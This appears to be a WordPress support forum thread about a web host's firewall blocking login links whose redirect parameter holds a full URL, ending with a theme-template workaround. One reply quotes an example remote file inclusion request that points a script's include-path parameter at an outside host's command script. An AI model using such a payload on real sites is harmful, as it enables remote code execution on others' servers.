An appropriate representation of the requested (etc)

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter evynco

    (@evynco)

    Here is the reply I got from my domain hosts Digitalis (australia) :
    —————-
    that link is being blocked by our http firewall.

    Any links which have variables that contain full urls in them will fail – I’m sorry but there is no way around this as this is how hackers commonly hack accounts by loading remote code into insecure local scripts.
    —————

    Nice simple answer !
    NOW I have to figure out why WP is building a link like that with the full redirect url in it.
    Anyone have a clue ?

    Hope this helps.

    Paul.

    8 years of hosting and I’ve never heard of an answer like that. I can see where they’re coming from but what they’re protecting from is open for abuse CGI scripts on their own servers like the older, unsecure versions of formmail.

    Goota admit that I’m leaning towards suggesting finding a new host.

    Thread Starter evynco

    (@evynco)

    Interesting comment drmike.
    I still wonder why the code has to build the link that way, but I’m a PHP/WP noob, so, what do I know… ??

    Thanks for the reply.

    theposterpreviouslyknownas

    (@theposterpreviouslyknownas)

    > but what they’re protecting from is open for abuse CGI scripts on their own servers like the older, unsecure versions of formmail.

    a very common and semi-generic example of what they are protecting against is this:

    https://www.domain.com/archives/2005/01/28/inc/CONTROL/imports/import-mt.php?basepath=foo&inc_path=https://www.chopstickz.net/xo/cmd.do?

    and thats NOT old. Mind you there are more user-friendly ways to take care of that, but the intention is good.

    There’s an easy work-around. The problem is that if you fix it in the way I’m about to detail, then the blog will not redirect back to the page that the user was on after they’ve registered. It’ll just redirect them to the main page of the site, and they’ll have to find the post again to comment on it.

    So, to do this, go into your admin panel and click on “Presentation”. Then click on the “Theme Editor” tab. On the right-hand side, where the list of your files is, look for the Comments template and click on it. Then look for this text:

    <p>You must be <a href="<?php echo get_option('siteurl'); ?>/wp-login.php?redirect_to=<?php the_permalink(); ?>">logged in</a> to post a comment.</p>

    Now, delete this text:

    ?redirect_to=<?php the_permalink(); ?>

    It’ll take the person to the login page, and then they can register from there.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘An appropriate representation of the requested (etc)’ is closed to new replies.